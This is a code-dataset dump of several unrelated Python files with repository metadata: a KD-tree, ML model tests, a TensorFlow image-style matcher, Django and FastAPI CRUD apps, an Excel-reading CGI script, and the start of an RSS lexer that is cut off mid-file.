'balanced_accuracy'],\n best_config_metric='accuracy',\n project_folder='./tmp',\n verbosity=1)\n\npipe += PipelineElement('StandardScaler')\n\npipe += PipelineElement('SVC',\n hyperparameters={'C': FloatRange(1e-6, 1e6)},\n gamma=gamma, kernel=kernel)\n\npipe.fit(X, y)\n\n", "repo_name": "wwu-mmll/photonai", "sub_path": "examples/advanced/svc_kernel_speed_up.py", "file_name": "svc_kernel_speed_up.py", "file_ext": "py", "file_size_in_byte": 1952, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 70, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.makedirs", "line_number": 12, "usage_type": "call"}, {"api_name": "joblib.Memory", "line_number": 13, "usage_type": "call"}, {"api_name": "sklearn.metrics.pairwise.rbf_kernel", "line_number": 18, "usage_type": "call"}, {"api_name": "sklearn.datasets.make_classification", "line_number": 25, "usage_type": "call"}, {"api_name": "photonai.Hyperpipe", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.model_selection.ShuffleSplit", "line_number": 41, "usage_type": "call"}, {"api_name": "sklearn.model_selection.ShuffleSplit", "line_number": 42, "usage_type": "call"}, {"api_name": "photonai.PipelineElement", "line_number": 50, "usage_type": "call"}, {"api_name": "photonai.PipelineElement", "line_number": 52, "usage_type": "call"}, {"api_name": "photonai.FloatRange", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "10851612170", "text": "from typing import List, Tuple, Callable, Optional\nimport numpy as np\nfrom dataclasses import dataclass, field\nimport heapq\n\n\n@dataclass\nclass _Node:\n point: np.ndarray # D-dimensional point\n idx: int\n axis: int\n left: \"Optional[_Node]\"\n right: \"Optional[_Node]\"\n\n\n@dataclass(order=True)\nclass _Candidate:\n dist: float\n idx: int = field(compare=False)\n\n\ndef _priority_push(container: List[_Candidate], element: _Candidate, max_size: int) -> None:\n element.dist *= -1 # hack for heapq to reverse order\n if len(container) >= max_size:\n heapq.heappushpop(container, element)\n else:\n heapq.heappush(container, element)\n\n\ndef _get_best_dist(container: List[_Candidate]) -> _Candidate:\n return -heapq.nlargest(1, container)[0].dist\n\n\ndef _get_sorted(container: List[_Candidate]) -> List[_Candidate]:\n return sorted(container, reverse=True)\n\n\ndef dist_l2(point_a: np.ndarray, point_b: np.ndarray) -> float:\n return np.sum((point_a-point_b) ** 2) ** 0.5\n\n\nclass KDTree:\n def __init__(self, data: np.ndarray, dist: Optional[Callable] = None):\n \"\"\"KDTree for fast generalized N-point problems\n\n Args:\n data (array-like of shape (n_samples, n_features)): [description]\n \"\"\"\n super().__init__()\n self.dist = dist\n if self.dist is None:\n self.dist = dist_l2\n self.dim: int = data.shape[1]\n indexes = np.arange(len(data))\n self.__tree: Optional[_Node] = self.__build_tree(data, indexes)\n\n def __build_tree(self, data: np.ndarray, indexes: np.ndarray, axis: int = 0) -> Optional[_Node]:\n if len(data) == 0:\n return None\n sorter = data[:, axis].argsort() # sort data over the split-axis\n data = data[sorter]\n indexes = indexes[sorter]\n # print('sort by ', axis)\n # print(data)\n middle_idx = data.shape[0] // 2\n middle = data[middle_idx]\n while (middle_idx+1) < data.shape[0] and data[middle_idx+1, axis] == middle[axis]:\n middle_idx += 1\n next_axis = (axis + 1) % data.shape[1]\n # print(middle, axis)\n return _Node(\n point=middle,\n idx=indexes[middle_idx],\n axis=axis,\n left=self.__build_tree(data[:middle_idx], indexes[:middle_idx], axis=next_axis),\n right=self.__build_tree(data[middle_idx+1:], indexes[middle_idx+1:], axis=next_axis)\n )\n\n def __nearest(self, storage: List[_Candidate], root: _Node, point: np.ndarray, axis: int, n: int):\n if root is None:\n return\n dist = self.dist(root.point, point)\n print(point, root.point, root.idx, dist)\n\n _priority_push(storage, _Candidate(idx=root.idx, dist=dist), max_size=n)\n\n if dist <= 0.000001: # why this magic number?\n return\n dx = root.point[axis] - point[axis]\n next_axis = (axis + 1) % point.shape[0]\n\n self.__nearest(storage, root.right if dx < 0 else root.left, point, next_axis, n)\n best_dist = _get_best_dist(storage)\n if dx**2 >= best_dist: # what is that?\n return\n self.__nearest(storage, root.left if dx < 0 else root.right, point, next_axis, n)\n\n def query(self, points: np.ndarray, n: int) -> Tuple[List[float], List[int]]:\n \"\"\"query the tree for the k nearest neighbors\n\n Args:\n points (array-like of shape (n_samples, n_features)): An array of points to query\n n (int): The number of nearest neighbours to return\n\n Returns:\n Tuple[List[float], List[int]]: list of (distances, indices) to the neighbors of the corresponding point.\n \"\"\"\n storage: List[_Candidate] = []\n self.__nearest(storage, self.__tree, points, axis=0, n=n)\n storage = _get_sorted(storage)\n print(storage)\n return [el.dist for el in storage], [el.idx for el in storage]\n\n def query_range(self):\n \"\"\"query all points inside the rectangle\n \"\"\"\n pass\n", "repo_name": "senior-sigan/data-structures-training", "sub_path": "k-d-tree/kd_tree.py", "file_name": "kd_tree.py", "file_ext": "py", "file_size_in_byte": 4018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.ndarray", "line_number": 9, "usage_type": "attribute"}, {"api_name": "dataclasses.dataclass", "line_number": 7, "usage_type": "name"}, {"api_name": "dataclasses.field", "line_number": 19, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 16, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 22, "usage_type": "name"}, {"api_name": "heapq.heappushpop", "line_number": 25, "usage_type": "call"}, {"api_name": "heapq.heappush", "line_number": 27, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 30, "usage_type": "name"}, {"api_name": "heapq.nlargest", "line_number": 31, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 34, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 38, "usage_type": "attribute"}, {"api_name": "numpy.sum", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 43, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 43, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 57, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 79, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 79, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 98, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 108, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 98, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 98, "usage_type": "name"}]} +{"seq_id": "40489472649", "text": "import torch\n\nfrom mmpose.models.backbones import I3D\n\n\ndef test_i3d_backbone():\n \"\"\"Test I3D backbone.\"\"\"\n model = I3D()\n model.train()\n\n vids = torch.randn(1, 3, 16, 112, 112)\n feat = model(vids)\n assert feat.shape == (1, 1024, 2, 3, 3)\n\n model = I3D(expansion=0.5)\n model.train()\n\n vids = torch.randn(1, 3, 32, 224, 224)\n feat = model(vids)\n assert feat.shape == (1, 512, 4, 7, 7)\n", "repo_name": "aim-uofa/Poseur", "sub_path": "tests/test_backbones/test_i3d.py", "file_name": "test_i3d.py", "file_ext": "py", "file_size_in_byte": 417, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 158, "dataset": "github-code", "pt": "61", "api": [{"api_name": "mmpose.models.backbones.I3D", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 11, "usage_type": "call"}, {"api_name": "mmpose.models.backbones.I3D", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.randn", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "41761979837", "text": "import os\nimport pathlib\n\nimport tensorflow as tf\nimport matplotlib as mpl\nimport pandas as pd\nimport logging\n\n# Load compressed models from tensorflow_hub\nos.environ['TFHUB_MODEL_LOAD_FORMAT'] = 'COMPRESSED'\nmpl.rcParams['figure.figsize'] = (12, 12)\nmpl.rcParams['axes.grid'] = False\n\nIMAGE_SIZE = 500\nlocal_path = pathlib.Path().resolve()\nstyles_path = local_path / 'styles'\nimage_classes_path = local_path / 'styles_classes'\n\n\ndef load_img(path_to_img):\n logging.info(f'Trying to load file {path_to_img}')\n img = tf.io.read_file(path_to_img)\n img = tf.image.decode_image(img, channels=3)\n img = tf.image.convert_image_dtype(img, tf.float32)\n shape = tf.cast(tf.shape(img)[:-1], tf.float32)\n long_dim = max(shape)\n scale = IMAGE_SIZE / long_dim\n new_shape = tf.cast(shape * scale, tf.int32)\n img = tf.image.resize(img, new_shape)\n img = img[tf.newaxis, :]\n img = img * 255\n return img\n\n\ndef find_images(path):\n images = pd.DataFrame()\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.endswith(\".jpg\"):\n path = os.path.join(file)\n path = pd.Series(data=path)\n images = images.append(path, ignore_index=True)\n logging.info(f'Find a file {path}')\n images.rename(columns={0: 'filename'}, inplace=True)\n logging.info(f'Find {len(images.index)} images')\n return images\n\n\ndef get_image_classes(images):\n df = pd.DataFrame()\n vgg = tf.keras.applications.VGG19(include_top=True, weights='imagenet')\n for index, row in images.iterrows():\n path = styles_path + images[\"filename\"][index]\n image = load_img(path)\n x = tf.keras.applications.vgg19.preprocess_input(image)\n x = tf.image.resize(x, (224, 224))\n prediction_probabilities = vgg(x)\n predicted_top_5 = pd.DataFrame(\n tf.keras.applications.vgg19.decode_predictions(prediction_probabilities.numpy())[0],\n columns=[\"id\", \"name\", \"probability\"])\n for ind, rw in predicted_top_5.iterrows():\n frame = [images[\"filename\"][index], predicted_top_5[\"id\"][ind], predicted_top_5[\"name\"][ind],\n predicted_top_5[\"probability\"][ind]]\n df2 = pd.DataFrame([frame], columns=[\"filename\", \"id\", \"name\", \"probability\"])\n df = df.append(df2, ignore_index=True)\n x = None\n logging.info(f'Return {len(df.index)} classes for images')\n return df\n\n\ndef match_style_image(image):\n logging.info(f'Looking for the best style image for {image}')\n image = load_img(image)\n vgg = tf.keras.applications.VGG19(include_top=True, weights='imagenet')\n x = tf.keras.applications.vgg19.preprocess_input(image)\n x = tf.image.resize(x, (224, 224))\n prediction_probabilities = vgg(x)\n predicted_top_5 = pd.DataFrame(\n tf.keras.applications.vgg19.decode_predictions(prediction_probabilities.numpy())[0],\n columns=[\"id\", \"name\", \"probability\"])\n path = image_classes_path / 'local_images_classes.csv'\n styles = pd.read_csv(str(path))\n styles = styles.merge(predicted_top_5, how='left', on='id',\n suffixes=('_left', '_right'))\n styles.sort_values(by=['probability_right', 'probability_left'], ascending=False, inplace=True)\n styles = styles.reset_index(drop=True)\n filename = styles['filename'][0]\n logging.info(f'Matched image {filename}')\n return filename\n\n\n\nif __name__ == '__main__':\n local_images = find_images(styles_path)\n local_images_classes = get_image_classes(local_images)\n path = image_classes_path / 'local_images_classes.csv'\n local_images_classes.to_csv(str(path))", "repo_name": "Fly-dream/telegram_bot_with_CV", "sub_path": "telegram_bot/image_processing/style_images_processing.py", "file_name": "style_images_processing.py", "file_ext": "py", "file_size_in_byte": 3701, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.environ", "line_number": 10, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 11, "usage_type": "attribute"}, {"api_name": "matplotlib.rcParams", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 15, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.io.read_file", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.image.decode_image", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.image.convert_image_dtype", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.image.resize", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.newaxis", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 36, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 41, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 43, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.keras.applications.VGG19", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 51, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.applications.vgg19.preprocess_input", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.image.resize", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.keras.applications.vgg19.decode_predictions", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 59, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 64, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 67, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.keras.applications.VGG19", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 74, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.applications.vgg19.preprocess_input", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tensorflow.image.resize", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.image", "line_number": 76, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.keras.applications.vgg19.decode_predictions", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 82, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 88, "usage_type": "call"}]} +{"seq_id": "7149878959", "text": "from django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom .views import (landing, home, logout, listagem_fabricante as list, novo_fabricante as novo, deletar_fabricante as delete,\n cadastra_cidade, cadastra_estado, cadastra_contato, atualiza_fabricante, remove_contato,\n lista_material as list_m, lista_material_a as list_a, cadastra_material,\n cadastra_tipo_de_material as cad_tipo_mat, altera_material, entrada_de_material,\n deleta_material)\n\nurlpatterns = [\n path('', landing, name='landing'),\n path('home/', home, name='home'),\n path('logout/', logout, name='logout'),\n path('fabricantes/', list, name='list_fabricantes'),\n path('fabricantes/novo/', novo, name='novo_fabricante'),\n path('fabricantes/remover/', delete, name='delete'),\n path('fabricantes/atualizar/', atualiza_fabricante, name='atualiza_fabricante'),\n path('fabricantes/contatos/', cadastra_contato, name='contato'),\n path('fabricantes/contatos/deletar/', remove_contato, name='remover_contato'),\n path('cidades/nova/', cadastra_cidade, name='nova_cidade'),\n path('estados/novo/', cadastra_estado, name='novo_estado'),\n path('materiais/', list_m, name='lista_material'),\n path('materiais/ordenada/', list_a, name='lista_m_alfa'),\n path('materiais/novo', cadastra_material, name='novo_material'),\n path('materiais/alterar/', altera_material, name='altera_material'),\n path('material/deletar/', deleta_material, name='deleta_material'),\n path('materiais/tipo/novo', cad_tipo_mat, name='novo_tipo_material'),\n path('materiais/entrada/', entrada_de_material, name='entrada_de_material'),\n] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)", "repo_name": "PauloViniciusBaleeiro/almoxarifado_FATEC_tg", "sub_path": "core/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1851, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.landing", "line_number": 11, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "views.home", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "views.logout", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "views.listagem_fabricante", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "views.novo_fabricante", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "views.deletar_fabricante", "line_number": 16, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "views.atualiza_fabricante", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "views.cadastra_contato", "line_number": 18, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "views.remove_contato", "line_number": 19, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "views.cadastra_cidade", "line_number": 20, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "views.cadastra_estado", "line_number": 21, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "views.lista_material", "line_number": 22, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "views.lista_material_a", "line_number": 23, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "views.cadastra_material", "line_number": 24, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "views.altera_material", "line_number": 25, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "views.deleta_material", "line_number": 26, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "views.cadastra_tipo_de_material", "line_number": 27, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "views.entrada_de_material", "line_number": 28, "usage_type": "argument"}, {"api_name": "django.conf.urls.static.static", "line_number": 29, "usage_type": "call"}, {"api_name": "django.conf.settings.STATIC_URL", "line_number": 29, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 29, "usage_type": "name"}, {"api_name": "django.conf.settings.STATIC_ROOT", "line_number": 29, "usage_type": "attribute"}]} +{"seq_id": "21559808213", "text": "from fastapi import FastAPI, Response, status, HTTPException\n\n\nfrom fastapi.params import Body\n\n\nfrom pydantic import BaseModel\n\n\nfrom typing import Optional\n\nfrom random import randrange\n\n\n\napp = FastAPI()\n\n\nclass Post(BaseModel):\n title: str\n content: str\n\n isPublished: bool = True\n\n rating: Optional[int] = None\n\n\nmy_posts = [{\"title\": \"title of post 1\", \"content\": \"content of post 1\", \"id\": 1}, {\n\n \"title\": \"Favourite foods\", \"content\": \"I love eating pizza\", \"id\": 2}]\n\n\ndef find_post(id):\n\n for p in my_posts:\n\n if p['id'] == id:\n return p\n\n\ndef find_index_post(id: int):\n\n for i , p in enumerate(my_posts):\n\n if p['id'] == id:\n\n return id\n\n\n@app.get(\"/\")\nasync def root():\n\n return {\"message\": \"Welcome to my api\"}\n\n\n@app.get(\"/posts\")\ndef get_post():\n\n return {\"data\": my_posts}\n\n\n@app.post(\"/posts\", status_code=status.HTTP_201_CREATED)\ndef create_post(post: Post):\n\n post_dic = post.dict()\n\n post_dic['id'] = randrange(0, 100000)\n\n my_posts.append(post_dic)\n\n print(post.dict())\n\n return {\"data\": my_posts}\n\n\n@app.get(\"/post/{id}\")\ndef getpost(id: int):\n\n post = find_post(id)\n if not post:\n\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND,\n detail=f\"Post with id{id} was not found\")\n\n return {\"post_detail\": post}\n\n\n@app.delete(\"/delposts/{id}\", status_code=status.HTTP_204_NO_CONTENT)\ndef delete_post(id: int):\n\n index = find_index_post(id)\n if index == None :\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail= f\"post with id:{id} does not exist\")\n print(\"ss\")\n print(index)\n my_posts.pop(index)\n\n return Response(status_code= status.HTTP_204_NO_CONTENT)\n@app.put(\"/posts/{id}\")\ndef update_post(id:int ,post:Post):\n index = find_index_post(id)\n if index == None :\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail= f\"post with id:{id} does not exist\")\n post_dic = post.dict()\n post_dic['id'] = id\n my_posts[index] = post_dic\n\n return {'message':\"updated post\"}", "repo_name": "ogomegbunam/fast_api", "sub_path": "chris/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2092, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.FastAPI", "line_number": 16, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 19, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "random.randrange", "line_number": 67, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_201_CREATED", "line_number": 62, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 62, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 82, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_404_NOT_FOUND", "line_number": 82, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 82, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 93, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_404_NOT_FOUND", "line_number": 93, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 93, "usage_type": "name"}, {"api_name": "fastapi.Response", "line_number": 98, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_204_NO_CONTENT", "line_number": 98, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 98, "usage_type": "name"}, {"api_name": "fastapi.status.HTTP_204_NO_CONTENT", "line_number": 88, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 88, "usage_type": "name"}, {"api_name": "fastapi.HTTPException", "line_number": 103, "usage_type": "call"}, {"api_name": "fastapi.status.HTTP_404_NOT_FOUND", "line_number": 103, "usage_type": "attribute"}, {"api_name": "fastapi.status", "line_number": 103, "usage_type": "name"}]} +{"seq_id": "12754574721", "text": "from django.test import TestCase\n\n# Create your tests here.\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom .models import Snack\n\n\nclass Tests(TestCase):\n def __init__(self):\n self.snack = None\n\n def setUp(self):\n self.user = get_user_model().objects.create_user(\n username=\"tester\", email=\"tester@email.com\", password=\"pass\"\n )\n\n self.snack = Snack.objects.create(\n title=\"Snack_Test\", purchaser='jana', description = \"this test is working\",\n )\n\n def test_string_representation(self):\n self.assertEqual(str(self.snack), \"Snack_Test\")\n\n def test_snack_content(self):\n self.assertEqual(f\"{self.snack.title}\", \"Snack_Test\")\n self.assertEqual(f\"{self.snack.description}\", \"this test is working\")\n self.assertEqual(f\"{self.snack.purchaser}\", 'jana')\n\n def test_snack_list_view(self):\n response = self.client.get(reverse(\"snack_list\"))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"Snack_Test\")\n self.assertTemplateUsed(response, \"snack_list.html\")\n\n def test_snack_detail_view(self):\n response = self.client.get(reverse(\"snack_detail\", args=\"1\"))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"description: this test is working\")\n self.assertTemplateUsed(response, \"snack_detail.html\")\n\n def test_snack_create_view(self):\n response = self.client.post(\n reverse(\"snack_create\"),\n {\n \"title\": \"snack34\",\n \"purchaser\": \"drake\",\n \"description\": \"ygibuoihiuhiuyvyu\",\n }, follow=True\n )\n\n self.assertRedirects(response, reverse(\"snack_detail\", args=\"2\"))\n self.assertContains(response, \"Details about snack34\")\n\n def test_snack_update_view_redirect(self):\n response = self.client.post(\n reverse(\"snack_update\", args=\"1\"),\n {\"title\": \"Updated title\",\"purchaser\":\"josh\",\"description\":\"byhuiojo\"}\n )\n\n self.assertRedirects(response, reverse(\"snack_detail\", args=\"1\"))\n\n def test_snack_delete_view(self):\n response = self.client.get(reverse(\"snack_delete\", args=\"1\"))\n self.assertEqual(response.status_code, 200)", "repo_name": "Jana998-alt/django-crud", "sub_path": "snacks/tests.py", "file_name": "tests.py", "file_ext": "py", "file_size_in_byte": 2361, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.test.TestCase", "line_number": 12, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 17, "usage_type": "call"}, {"api_name": "models.Snack.objects.create", "line_number": 21, "usage_type": "call"}, {"api_name": "models.Snack.objects", "line_number": 21, "usage_type": "attribute"}, {"api_name": "models.Snack", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.reverse", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 40, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 47, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 55, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 60, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 64, "usage_type": "call"}, {"api_name": "django.urls.reverse", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "42576977271", "text": "import xlrd\nimport random\nimport json\n\n\ndef read_excel():\n path = 'C:\\\\Users\\\\omignot\\\\Desktop\\\\names.xls'\n sheet = 'f1'\n try:\n wb1 = xlrd.open_workbook(path, encoding_override=\"gb2312\")\n wb1_sheet1 = wb1.sheet_by_name(sheet)\n \n \n experts=\"\"\"[\"\"\"\n \n \n for j in range(5, 62): \n \n expert1_nom = wb1_sheet1.cell_value(j, 1)\n expert1_prenom = wb1_sheet1.cell_value(j, 2)\n expert1_num = wb1_sheet1.cell_value(j, 3)\n expert1_lieu = wb1_sheet1.cell_value(j, 4)\n expert1_expertise = wb1_sheet1.cell_value(j, 5)\n \n field1 = \"nom\"\n field2 = \"prenom\"\n field3 = \"tel1\"\n field4 = \"type\"\n \n if j != 61:\n experts+= \"{\"\n experts+= \"\\\"nom\\\":\\\"\"+expert1_nom+\"\\\",\"\n experts+= \"\\\"prenom\\\":\\\"\"+expert1_prenom+\"\\\",\"\n experts+= \"\\\"tel1\\\":\\\"\"+expert1_num+\"\\\",\"\n experts+= \"\\\"lieu\\\":\\\"\"+expert1_lieu+\"\\\",\"\n experts+= \"\\\"type\\\":\\\"\"+expert1_expertise+\"\\\"}\"\n experts+=\",\"\n else:\n experts+= \"{\"\n experts+= \"\\\"nom\\\":\\\"\"+expert1_nom +\"\\\",\"\n experts+= \"\\\"prenom\\\":\\\"\"+expert1_prenom +\"\\\",\"\n experts+= \"\\\"tel1\\\":\\\"\"+expert1_num+\"\\\",\"\n experts+= \"\\\"lieu\\\":\\\"\"+expert1_lieu+\"\\\",\"\n experts+= \"\\\"type\\\":\\\"\"+expert1_expertise+\"\\\"}\"\n \n experts+= \"\"\"]\"\"\"\n \n print('Content-Type: application/json')\n print('')\n print(experts)\n except xlrd.biffh.XLRDError:\n print(\"Le fichier d'entrée : \\\"\" + path + \"\\\" est vide\")\n\nread_excel()", "repo_name": "OliverJugger/meli", "sub_path": "python2/cgi-bin/all.py", "file_name": "all.py", "file_ext": "py", "file_size_in_byte": 1747, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "xlrd.open_workbook", "line_number": 10, "usage_type": "call"}, {"api_name": "xlrd.biffh", "line_number": 51, "usage_type": "attribute"}]} +{"seq_id": "33949636107", "text": "#importar librerias\nimport ply.lex as lex\nimport re \nimport codecs\nimport os\nimport sys\nimport pathlib\n\n\nreservadas = ['APERTURA_XML', 'VERSION_XML', 'ENCODING_VERSION', 'CIERRE_XML', 'APERTURA_RSS', 'VERSION_RSS', 'CIERRE_RSS', 'APERTURA_CHANNEL', 'CIERRE_CHANNEL', 'APERTURA_TITLE', 'CIERRE_TITLE', 'APERTURA_LINK', 'CIERRE_LINK', 'APERTURA_DESC', 'CIERRE_DESC', 'APERTURA_CAT', 'CIERRE_CAT', 'APERTURA_COPY', 'CIERRE_COPY', 'APERTURA_IMAG', 'CIERRE_IMAG', 'APERTURA_HEIGHT', 'CIERRE_HEIGHT', 'APERTURA_WIDTH', 'CIERRE_WIDTH', 'APERTURA_ITEM', 'CIERRE_ITEM', 'APERTURA_LANGUAGE', 'CIERRE_LANGUAGE', 'APERTURA_WEBMASTER', 'CIERRE_WEBMASTER', 'URL', 